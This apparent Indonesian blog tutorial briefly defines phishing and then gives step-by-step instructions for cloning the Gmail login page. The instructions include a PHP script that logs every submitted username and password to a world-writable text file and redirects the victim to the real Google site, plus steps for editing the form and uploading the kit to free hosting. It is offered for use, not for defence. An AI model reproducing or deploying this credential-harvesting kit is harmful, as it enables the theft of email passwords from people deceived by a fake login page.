PHISING DAN CONTOH CARA MEMBUAT PHISING PAGE

Phising merupakan kata plesetan dari bahasa Inggris yang berarti memancing. Dalam dunia yang serba terhubung secara elektronik saat ini, istilah phising banyak diartikan sebagai suatu cara untuk memancing seseorang ke halaman tertentu.

Phising tidak jarang digunakan oleh para pelaku kriminal di internet untuk memancing seseorang agar mendatangi alamat web melalui e-mail, salah satu tujuannya adalah untuk menjebol informasi yang sangat pribadi dari sang penerima email, seperti password, kartu kredit, dll.

Diantaranya dengan mengirimkan informasi yang seakan-akan dari penerima e-mail mendapatkan pesan dari sebuah situs, lalu mengundangnya untuk mendatangi sebuah situs palsu. Situs palsu dibuat sedemikian rupa yang penampilannya mirip dengan situs asli. lalu ketika korban mengisikan password maka pada saat itulah penjahat ini mengetahui password korban. Penggunaan situs palsu ini disebut juga dengan istilah pharming.

Contoh: Membuat Gmail Phising Page

Step 1.

a. Buka website http://gmail.com

b. Klik File > Save Page As (ctrl + s)

  

c. Setelah Anda simpan, ubah nama ServiceLogin.htm menjadi index.htm.

Step 2.

a. Buka notepad dan copy paste script berikut.

PHP Code:

<?php
header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');
$handle = fopen("logs.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save it as mail.php

b. Buka notepad dan copas script berikut:

ltmpl=default
ltmplcache=2
continue=http://mail.google.com/mail/?
service=mail
rm=false
Email=victim@gmail.com
Passwd=victimpassword
rmShown=1
signIn=Sign in

Save as logs.txt

Step 3.

a. Open Index.htm dengan notepad dan cari script berikut:

Ganti script tersebut dengan script berikut ini:

<form id="gaia_loginform" action="mail.php" method="post"> 

Step 4.

a. Sekarang kita mempunyai 4 files

b. Upload semua file tersebut ke webhosting (yang gratisan jg bolehhhh) dan jangan lupa chmod "logs.txt" adalah 777

Sekian semoga ini bermanfaat.

Salam.